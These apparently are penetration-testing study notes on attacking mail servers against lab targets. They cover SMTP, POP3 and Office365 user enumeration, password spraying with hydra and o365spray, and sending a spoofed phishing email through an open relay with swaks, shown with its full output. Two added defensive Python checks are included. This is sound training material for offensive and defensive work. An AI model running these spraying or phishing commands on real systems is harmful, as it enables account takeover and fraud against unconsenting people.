Attacking Email Services
What I would do if I encounter email services while pentesting:
- first, run an nmap scan against the mail ports
- then, enumerate users on the mail server and spray passwords against the accounts found (if the mail service is hosted in the cloud, use o365spray)
- once I have valid credentials, log in and read the mailbox by telnetting into POP3
Table of Contents
- Enumeration
  - MX Records
  - Ports
  - User Enumeration
  - Cloud Enumeration
- Password Attacks
- Protocol Specific Attacks
Enumeration
MX Records
host:
> host -t MX hackthebox.eu
hackthebox.eu mail is handled by 1 aspmx.l.google.com.
> host -t MX microsoft.com
microsoft.com mail is handled by 10 microsoft-com.mail.protection.outlook.com.
> host -t A mail1.inlanefreight.htb.
mail1.inlanefreight.htb has address 10.129.14.128
dig:
> dig mx plaintext.do | grep "MX" | grep -v ";"
plaintext.do. 7076 IN MX 50 mx3.zoho.com.
plaintext.do. 7076 IN MX 10 mx.zoho.com.
plaintext.do. 7076 IN MX 20 mx2.zoho.com.
> dig mx inlanefreight.com | grep "MX" | grep -v ";"
inlanefreight.com. 300 IN MX 10 mail1.inlanefreight.com.
Ports
ports to enumerate on a custom (self-hosted) mail server:
Port | Service
---|---
TCP/25 | SMTP Unencrypted
TCP/143 | IMAP4 Unencrypted
TCP/110 | POP3 Unencrypted
TCP/465 | SMTP Encrypted
TCP/587 | SMTP Encrypted/STARTTLS
TCP/993 | IMAP4 Encrypted
TCP/995 | POP3 Encrypted
nmap:
sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128
User Enumeration
VRFY
- connect via telnet
telnet 10.10.110.20 25
- check whether a user exists
VRFY www-data
or
VRFY root
EXPN
a bigger problem than VRFY: sites often have aliases such as "all" or a team list, and EXPN expands them into their member addresses, exposing several users at once
> telnet 10.10.110.20 25
EXPN john
250 2.1.0 john@inlanefreight.htb
EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb
RCPT TO
> telnet 10.129.62.133 25
Trying 10.129.62.133...
Connected to 10.129.62.133.
Escape character is '^]'.
220 WIN-EASY ESMTP
HELO example.com
250 Hello.
MAIL FROM:<test@example.com>
250 OK
RCPT TO:<fiona@inlanefreight.htb>
250 OK
RCPT TO: <fuck@inlanefreight.htb>
550 Unknown user
USER
USER is a POP3 command rather than SMTP, so telnet to port 110 instead; -ERR means the user does not exist, +OK means it does (caveat: some servers answer +OK to every USER and only fail at PASS, so this is not reliable everywhere)
> telnet 10.10.110.20 110
USER julio
-ERR
USER john
+OK
Automated User Enumeration
smtp-user-enum -M VRFY -U userlist.txt -t 10.129.40.47 -w 20
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
-M selects the method: VRFY, RCPT, or EXPN
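A defender-side check to go with the VRFY/EXPN/RCPT TO techniques above: an added example (not from these notes or any tool they mention) that scans mail-server log lines for the traces those probes leave, namely VRFY/EXPN attempts and bursts of unknown-recipient rejects from a single client. The sample lines are constructed in a Postfix-style layout, which is an assumption; adapt REJECT_RE to whatever reject lines your own MTA actually writes.

```python
import re
from collections import Counter, defaultdict

# Constructed, Postfix-style smtpd reject lines (not captured from a real
# server). The field layout is an assumption: check REJECT_RE against the
# reject lines your own MTA writes before relying on this.
SAMPLE_LOG = """\
Apr 13 09:48:02 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <alice@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<alice@inlanefreight.htb> proto=SMTP helo=<example.com>
Apr 13 09:48:02 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <bob@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<bob@inlanefreight.htb> proto=SMTP helo=<example.com>
Apr 13 09:48:03 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <carol@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<carol@inlanefreight.htb> proto=SMTP helo=<example.com>
Apr 13 09:48:03 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <dave@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<dave@inlanefreight.htb> proto=SMTP helo=<example.com>
Apr 13 09:48:04 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <erin@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@example.com> to=<erin@inlanefreight.htb> proto=SMTP helo=<example.com>
Apr 13 09:48:09 mail postfix/smtpd[2214]: NOQUEUE: reject: VRFY from unknown[10.10.14.9]: 550 5.1.1 <www-data@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; to=<www-data@inlanefreight.htb> proto=SMTP helo=<example.com>
Apr 13 09:50:00 mail postfix/smtpd[2220]: NOQUEUE: reject: RCPT from mta.partner.example[203.0.113.7]: 550 5.1.1 <typo@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<hr@partner.example> to=<typo@inlanefreight.htb> proto=ESMTP helo=<mta.partner.example>
"""

# One reject line -> (command, client IP, reply code)
REJECT_RE = re.compile(
    r"reject: (?P<cmd>RCPT|VRFY|EXPN) from \S*\[(?P<ip>[^\]]+)\]: (?P<code>\d{3})"
)

def enumeration_suspects(log_text, rcpt_threshold=5):
    """Return {client_ip: [reasons]} for clients whose SMTP traffic looks like
    user enumeration: any VRFY/EXPN probe, or at least rcpt_threshold permanent
    (5xx) RCPT TO rejects. A lone typo from a real MTA stays below threshold."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if not m:
            continue
        if m["cmd"] in ("VRFY", "EXPN"):
            per_ip[m["ip"]]["probe"] += 1
        elif m["code"].startswith("5"):
            per_ip[m["ip"]]["rcpt_reject"] += 1
    suspects = {}
    for ip, c in per_ip.items():
        reasons = []
        if c["probe"]:
            reasons.append(f"VRFY/EXPN probes: {c['probe']}")
        if c["rcpt_reject"] >= rcpt_threshold:
            reasons.append(f"unknown-recipient rejects: {c['rcpt_reject']}")
        if reasons:
            suspects[ip] = reasons
    return suspects

if __name__ == "__main__":
    for ip, reasons in sorted(enumeration_suspects(SAMPLE_LOG).items()):
        print(ip, "->", "; ".join(reasons))
```

The threshold is deliberately per client rather than per command, because RCPT TO probing is spread over many connections and each one looks harmless on its own.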
Cloud Enumeration
when the mail service is not a custom server but is hosted by a cloud provider
Office365
- validate that the target domain is using Office365 (download o365spray.py first)
> python3 o365spray.py --validate --domain msplaintext.xyz
*** O365 Spray ***
>----------------------------------------<
> version : 2.0.4
> domain : msplaintext.xyz
> validate : True
> timeout : 25 seconds
> start : 2022-04-13 09:46:40
>----------------------------------------<
[2022-04-13 09:46:40,344] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:46:40,743] INFO : [VALID] The following domain is using O365: msplaintext.xyz
- identify valid usernames
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
*** O365 Spray ***
>----------------------------------------<
> version : 2.0.4
> domain : msplaintext.xyz
> enum : True
> userfile : users.txt
> enum_module : office
> rate : 10 threads
> timeout : 25 seconds
> start : 2022-04-13 09:48:03
>----------------------------------------<
[2022-04-13 09:48:03,621] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:48:04,062] INFO : [VALID] The following domain is using O365: msplaintext.xyz
[2022-04-13 09:48:04,064] INFO : Running user enumeration against 67 potential users
[2022-04-13 09:48:08,244] INFO : [VALID] lewen@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO : [VALID] juurena@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO :
[ * ] Valid accounts can be found at: '/opt/o365spray/enum/enum_valid_accounts.2204130948.txt'
[ * ] All enumerated accounts can be found at: '/opt/o365spray/enum/enum_tested_accounts.2204130948.txt'
[2022-04-13 09:48:10,416] INFO : Valid Accounts: 2
Password Spraying
once we have usernames, we can attempt to spray passwords against them
POP3
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
Office365 Spraying
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
Protocol Specific Attacks
SMTP Open Relay
- check whether the server is an open relay
nmap -p25 -Pn --script smtp-open-relay 10.10.11.213
- if it is, any mail client can connect and send mail through it
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213
=== Trying 10.10.11.213:25...
=== Connected to 10.10.11.213.
<- 220 mail.localdomain SMTP Mailer ready
-> EHLO parrot
<- 250-mail.localdomain
<- 250-SIZE 33554432
<- 250-8BITMIME
<- 250-STARTTLS
<- 250-AUTH LOGIN PLAIN CRAM-MD5 CRAM-SHA1
<- 250 HELP
-> MAIL FROM:<notifications@inlanefreight.com>
<- 250 OK
-> RCPT TO:<employees@inlanefreight.com>
<- 250 OK
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Thu, 29 Oct 2020 01:36:06 -0400
-> To: employees@inlanefreight.com
-> From: notifications@inlanefreight.com
-> Subject: Company Notification
-> Message-Id: <20201029013606.775675@parrot>
-> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
->
-> Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/
->
->
-> .
<- 250 OK
-> QUIT
<- 221 Bye
=== Connection closed with remote host.
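To confirm that a server you administer refuses relaying (for example after a configuration change), an added example that is not from these notes: it drives the same MAIL FROM / RCPT TO exchange the nmap script and swaks use, stops before DATA so no message is ever sent, and reports the verdict. The relaytest@example.net / example.org addresses and the relay_verdict / check_open_relay names are assumptions.

```python
import smtplib

# Two addresses in domains the server under test does not host (assumption:
# change them if your server legitimately handles example.net or example.org).
EXT_SENDER = "relaytest@example.net"
EXT_RECIPIENT = "relaytest@example.org"

def relay_verdict(conn, sender=EXT_SENDER, recipient=EXT_RECIPIENT):
    """Run MAIL FROM / RCPT TO on an open SMTP session and classify the reply.

    conn needs mail(), rcpt() and rset() returning (code, message) like
    smtplib.SMTP does. Returns (open_relay, detail). Nothing is delivered:
    the envelope is thrown away with RSET instead of proceeding to DATA.
    """
    code, msg = conn.mail(sender)
    if code != 250:
        return False, f"MAIL FROM refused: {code} {msg.decode(errors='replace')}"
    code, msg = conn.rcpt(recipient)
    conn.rset()
    detail = f"RCPT TO external address: {code} {msg.decode(errors='replace')}"
    # 250 here means the server accepted foreign sender -> foreign recipient,
    # i.e. it would relay for anyone. Some MTAs defer the relay decision until
    # DATA, so treat 250 as a strong signal and confirm with the nmap
    # smtp-open-relay script from the notes above.
    return code == 250, detail

def check_open_relay(host, port=25, timeout=10):
    """Connect to a server you administer and run relay_verdict against it."""
    with smtplib.SMTP(host, port, timeout=timeout) as conn:
        conn.ehlo_or_helo_if_needed()
        return relay_verdict(conn)

if __name__ == "__main__":
    import sys
    is_open, detail = check_open_relay(sys.argv[1])
    print(("OPEN RELAY: " if is_open else "relay refused: ") + detail)
```

A hardened server typically answers the RCPT TO with a 5xx such as "Relay access denied"; test from a network the server does not treat as trusted, since relaying is usually allowed for internal clients.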
connecting to the encrypted POP3 server (POP3S) on port 995:
openssl s_client -connect 10.129.180.139:995